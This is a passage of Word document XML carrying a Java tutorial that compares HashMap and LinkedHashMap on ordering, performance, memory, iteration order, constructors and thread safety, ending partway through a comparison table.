          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It can also be configured to maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>access order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the order in which the entries were last accessed), which is useful for implementing caches where frequently accessed entries move to the end of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C5025" w14:textId="77777777" w:rsidR="00FF1E10"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0A2A0CD">
          <v:rect id="_x0000_i1442" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B85FD" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D901FFD" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D280807" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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aster for Lookup and Insertion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap generally performs better than LinkedHashMap when it comes to lookup and insertion operations because it does not have to maintain any ordering. Both operations are typically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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C8A339" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AA1C4" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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lightly Slower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: LinkedHashMap is slightly slower than HashMap for insertions and lookups due to the additional overhead of maintaining the linked list for ordering. However, the difference is usually small unless you are dealing with a large number of entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258CB0CD" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Insertion and Access Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The ordering feature can cause a minor performance penalty during updates (insertion, removal, and reordering) compared to HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21675EB9" w14:textId="77777777" w:rsidR="00FF1E10"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9FFAA4B">
          <v:rect id="_x0000_i1443" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9A62B" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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Memory Overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285873A0" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645876D9" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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wer Memory Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since HashMap only stores the key-value pairs and does not maintain any linked list for ordering, it has a lower memory overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D445BD" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A843482" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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igher Memory Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: LinkedHashMap maintains an additional linked list to track the insertion order or access order, which results in higher memory usage compared to HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF38B2" w14:textId="77777777" w:rsidR="00FF1E10"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034E693">
          <v:rect id="_x0000_i1444" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EB37F" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88D6C5" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA40FEC" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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st for Unordered Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap is suitable when you do not need the elements to be ordered and are primarily interested in fast lookups, insertions, and deletions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240387BC" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to store and retrieve data efficiently without any specific order (e.g., a map of user IDs and their associated data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AF736" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266AAA23" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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st for Maintaining Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: LinkedHashMap is ideal when you need to preserve the insertion order or track the order of access to entries, such as in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cache</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LRU cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Least Recently Used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650DBA2F" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the order in which elements are inserted or accessed is important (e.g., in maintaining a cache that evicts the least recently accessed entries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC8320" w14:textId="77777777" w:rsidR="00FF1E10"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87E5B62">
          <v:rect id="_x0000_i1445" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F4B9A" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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Iteration Order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7418C7" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE76F38" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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iteration order of entries in a HashMap is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not predictable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It may appear random and may change when the map is modified (rehashed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2AAE3" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C827D89" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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iteration order in a LinkedHashMap is predictable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516DE04" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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on order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The order in which entries were inserted into the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195012DA" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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 order (if enabled)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The order in which entries were last accessed. This is useful for implementing cache-like structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFEF0B" w14:textId="77777777" w:rsidR="00FF1E10"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84B179">
          <v:rect id="_x0000_i1446" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2352A" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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Constructor Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE60A1" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDC832" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ndard Constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: new HashMap()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B5F97D" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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apacity and Load Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: new HashMap(initialCapacity, loadFactor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830E349" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C4E2D" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ndard Constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: new LinkedHashMap()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FC1FB" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ith Access Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: new LinkedHashMap(initialCapacity, loadFactor, accessOrder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE18569" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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accessOrder flag, if set to true, ensures that the map maintains the order of access rather than insertion order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7F512" w14:textId="77777777" w:rsidR="00FF1E10"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7990D87">
          <v:rect id="_x0000_i1447" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E118AE7" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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7. Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620AB82D" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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oth </w:t>
      </w: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LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. If thread safety is required, you must use synchronization or alternatives like ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504884A4" w14:textId="77777777" w:rsidR="00FF1E10"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5A8D216">
          <v:rect id="_x0000_i1448" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09156FCF" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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Quick Comparis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05"/>
        <w:gridCol w:w="2511"/>
        <w:gridCol w:w="5302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="087C6AE7" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="166EFEB7" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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3B2E73E5" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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ashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0020E1A0" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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LinkedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6E95A3A7" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="281DE71A"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rder of Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E37A7BB"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specific order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="582A6C9D"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intains insertion order or access order (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="195D3005" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DB4334D"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05211813"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aster (O(1) for operations)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61A53132"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lightly slower due to extra overhead (O(1) for operations)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="563E96D5" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2707F607"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Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77762595"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wer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A8CCA6E"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igher (due to linked list for ordering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7929ADB3" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A2D3E0C"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74B235F0"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nordered collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
